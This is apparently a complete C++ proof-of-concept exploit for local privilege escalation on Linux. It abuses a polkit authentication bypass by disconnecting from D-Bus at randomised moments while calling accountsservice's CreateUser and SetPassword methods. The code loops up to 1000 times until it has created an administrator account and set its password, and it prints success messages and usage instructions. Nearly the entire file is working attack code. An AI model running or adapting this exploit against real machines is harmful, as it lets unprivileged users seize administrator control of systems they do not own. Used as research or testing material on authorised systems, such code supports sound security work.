#include "dbus_utils.hpp"
#include "dbus_auth.hpp"
#include "parse.hpp"
#include "utils.hpp"
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <crypt.h>
#include <errno.h>
#include <spawn.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <cstdint>
#include <functional>
#include <memory>
#include <random>
#include <utility>
#include <assert.h>

// When we set the password, we also have to supply a hint.  No privileges
// are required to ask for the password hint, so this is a useful way to
// check if we successfully set the password. (The hint will be an empty
// string if the password isn't set.)
static const char* passwordhint = "GoldenEye";

class DBusSocket : public AutoCloseFD {
public:
  DBusSocket(const uid_t uid, const char* filename) :
    AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
  {
    if (get() < 0) {
      throw ErrorWithErrno("Could not create socket");
    }

    sockaddr_un address;
    memset(&address, 0, sizeof(address));
    address.sun_family = AF_UNIX;
    strcpy(address.sun_path, filename);

    if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
      throw ErrorWithErrno("Could not connect socket");
    }

    dbus_sendauth(uid, get());

    dbus_send_hello(get());
    std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get());
    std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
    std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get());
  }
};

static std::string send_accountsservice_FindUserByName(
  const int fd,
  const char* username,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s(username))
      )
    ),
    _s("/org/freedesktop/Accounts"),
    _s("org.freedesktop.Accounts"),
    _s("org.freedesktop.Accounts"),
    _s("FindUserByName")
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);

  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("FindUserByName returned an error.");
  }

  return reply->getBody().getElement(0)->toPath().getValue();
}

// Check if an account with the given username already exists.
static std::string lookup_username(
  const uid_t uid,
  const char* filename,
  const char* username
) {
  DBusSocket fd(uid, filename);
  return send_accountsservice_FindUserByName(fd.get(), username, 1001);
}

static bool username_exists(
  const uid_t uid,
  const char* filename,
  const char* username
) {
  DBusSocket fd(uid, filename);
  try {
    send_accountsservice_FindUserByName(fd.get(), username, 1001);
  } catch(Error&) {
    return false;
  }
  return true;
}

static void send_accountsservice_CreateUser(
  const int fd,
  const char* username,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s(username)),
        DBusObjectString::mk(_s(username)),
        DBusObjectInt32::mk(1)
      )
    ),
    _s("/org/freedesktop/Accounts"),
    _s("org.freedesktop.Accounts"),
    _s("org.freedesktop.Accounts"),
    _s("CreateUser")
  );
}

// Record the amount of time it takes to get a response from the
// CreateUser method. The response will be an error because
// it will be denied by polkit. This response time gives us an upper
// bound on how long we need to wait before disconnecting when we
// attempt to trigger the bug.
static long record_time_CreateUser(
  const uid_t uid, const char* filename, const char* username
) {
  DBusSocket fd(uid, filename);

  // Start a timer.
  timespec starttime;
  clock_gettime(CLOCK_MONOTONIC, &starttime);

  send_accountsservice_CreateUser(fd.get(), username, 1001);
  receive_dbus_message(fd.get());

  // Stop the timer.
  timespec endtime;
  clock_gettime(CLOCK_MONOTONIC, &endtime);

  // Calculate the time difference.
  long diff =
    (1000000000 * (endtime.tv_sec - starttime.tv_sec)) +
    (endtime.tv_nsec - starttime.tv_nsec);

  return diff;
}

// This function calls the CreateUser method, but doesn't wait for the
// reply. Instead it disconnects from D-Bus after the specified number of
// nanoseconds. If we get lucky with the timing of the delay, it will
// hopefully trigger the bug and bypass polkit.
static void attempt_CreateUser_with_disconnect(
  const uid_t uid,
  const char* filename,
  const char* username,
  const long delay
) {
  DBusSocket fd(uid, filename);

  timespec duration;
  duration.tv_sec = delay / 1000000000;
  duration.tv_nsec = delay % 1000000000;

  send_accountsservice_CreateUser(fd.get(), username, 1001);
  clock_nanosleep(CLOCK_MONOTONIC, 0, &duration, 0);

  // Returning from this function automatically disconnects us from D-Bus
  // because DBusSocket's destructor closes the file descriptor.
}

// Keep trying `attempt_CreateUser_with_disconnect` with different
// delay values until the exploit succeeds (or we decide to give up).
static std::string exploit_CreateUser(
  const uid_t uid,
  const char* filename,
  const char* username
) {
  // First measure how long a regular CreateUser method call takes.
  const long elapsed =
    record_time_CreateUser(uid, filename, username);
  printf("Elapsed time: %ld nanoseconds\n", elapsed);

  // Random number generator which will generate random
  // pause times in the range 0 .. 2*elapsed.
  std::random_device rd;
  std::mt19937 gen(rd());
  std::uniform_int_distribution<long> distrib(0, 2*elapsed);

  // If it doesn't succeed after 1000 attempts then it probably
  // isn't going to work.
  for (size_t i = 0; i < 1000; i++) {
    const long delay = distrib(gen);
    attempt_CreateUser_with_disconnect(uid, filename, username, delay);
    try {
      // Check if the username has been created.
      std::string userpath = lookup_username(uid, filename, username);
      printf(
        "Successfully created %s after %ld iterations,\n"
        "with a delay value of %ld nanoseconds\n",
        userpath.c_str(), i, delay
      );
      return userpath;
    } catch (Error&) {
      // Keep going.
    }
  }

  throw Error("Failed to create new user account.");
}

static void send_accountsservice_SetPassword(
  const int fd,
  const char* userpath,
  const char* password,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s(password)),
        DBusObjectString::mk(_s(passwordhint))
      )
    ),
    _s(userpath),
    _s("org.freedesktop.Accounts.User"),
    _s("org.freedesktop.Accounts"),
    _s("SetPassword")
  );
}

// Useful for determining if we have successfully set the password.
// If the password is set, then the hint will be set too.
static std::string send_accountsservice_GetPasswordHint(
  const int fd,
  const char* userpath,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s("org.freedesktop.Accounts.User")),
        DBusObjectString::mk(_s("PasswordHint"))
      )
    ),
    _s(userpath),
    _s("org.freedesktop.DBus.Properties"),
    _s("org.freedesktop.Accounts"),
    _s("Get")
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);

  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("GetPasswordHint returned an error.");
  }

  return reply->getBody().getElement(0)->toVariant().getValue()->toString().getValue();
}

static bool has_passwordhint(
  const uid_t uid,
  const char* filename,
  const char* userpath
) {
  DBusSocket fd(uid, filename);
  std::string hint =
    send_accountsservice_GetPasswordHint(fd.get(), userpath, 1001);
  return strcmp(hint.c_str(), passwordhint) == 0;
}

// Record the amount of time it takes to get a response from the
// SetPassword method. The response will be an error because
// it will be denied by polkit. This response time gives us an upper
// bound on how long we need to wait before disconnecting when we
// attempt to trigger the bug.
static long record_time_SetPassword(
  const uid_t uid,
  const char* filename,
  const char* userpath,
  const char* password
) {
  DBusSocket fd(uid, filename);

  // Start a timer.
  timespec starttime;
  clock_gettime(CLOCK_MONOTONIC, &starttime);

  send_accountsservice_SetPassword(fd.get(), userpath, password, 1001);
  receive_dbus_message(fd.get());

  // Stop the timer.
  timespec endtime;
  clock_gettime(CLOCK_MONOTONIC, &endtime);

  // Calculate the time difference.
  long diff =
    (1000000000 * (endtime.tv_sec - starttime.tv_sec)) +
    (endtime.tv_nsec - starttime.tv_nsec);

  return diff;
}

// This function calls the SetPassword method, but doesn't wait for the
// reply. Instead it disconnects from D-Bus after the specified number of
// nanoseconds. If we get lucky with the timing of the delay, it will
// hopefully trigger the bug and bypass polkit.
static void attempt_SetPassword_with_disconnect(
  const uid_t uid,
  const char* filename,
  const char* userpath,
  const char* password,
  const long delay
) {
  DBusSocket fd(uid, filename);

  timespec duration;
  duration.tv_sec = delay / 1000000000;
  duration.tv_nsec = delay % 1000000000;

  send_accountsservice_SetPassword(fd.get(), userpath, password, 1001);
  clock_nanosleep(CLOCK_MONOTONIC, 0, &duration, 0);

  // Returning from this function automatically disconnects us from D-Bus
  // because DBusSocket's destructor closes the file descriptor.
}

// Keep trying `attempt_SetPassword_with_disconnect` with different
// delay values until the exploit succeeds (or we decide to give up).
static void exploit_SetPassword(
  const uid_t uid,
  const char* filename,
  const char* userpath,
  const char* password
) {
  // First measure how long a regular SetPassword method call takes.
  const long elapsed =
    record_time_SetPassword(uid, filename, userpath, password);
  printf("Elapsed time: %ld nanoseconds\n", elapsed);

  // Random number generator which will generate random
  // pause times in the range 0 .. 2*elapsed.
  std::random_device rd;
  std::mt19937 gen(rd());
  std::uniform_int_distribution<long> distrib(0, 2*elapsed);

  // If it doesn't succeed after 1000 attempts then it probably
  // isn't going to work.
  for (size_t i = 0; i < 1000; i++) {
    const long delay = distrib(gen);
    attempt_SetPassword_with_disconnect(uid, filename, userpath, password, delay);
    if (has_passwordhint(uid, filename, userpath)) {
      printf("Success!\n");
      return;
    }
  }

  throw Error("Failed to create new user account.");
}

int main(int argc, char* argv[]) {
  const char* progname = argc > 0 ? argv[0] : "a.out";
  if (argc != 4) {
    fprintf(
      stderr,
      "usage:   %s <unix socket path> <username> <password>\n"
      "example: %s /var/run/dbus/system_bus_socket boris iaminvincible\n",
      progname,
      progname
    );
    return EXIT_FAILURE;
  }

  const uid_t uid = getuid();
  const char* filename = argv[1];
  const char* username = argv[2];
  const char* passphrase = argv[3];

  // Convert the passphrase to a hash.
  char salt[CRYPT_GENSALT_OUTPUT_SIZE] = {};
  struct crypt_data cryptdata = {};
  crypt_gensalt_rn("$6$", 0, 0, 0, salt, sizeof(salt));
  crypt_r(passphrase, salt, &cryptdata);
  const char* password = cryptdata.output;

  if (username_exists(uid, filename, username)) {
    fprintf(
      stderr,
      "Error: username %s already exists.\n"
      "Please try again with a different username.\n",
      username
    );
    return EXIT_FAILURE;
  }

  std::string userpath = exploit_CreateUser(uid, filename, username);
  exploit_SetPassword(uid, filename, userpath.c_str(), password);

  return EXIT_SUCCESS;
}
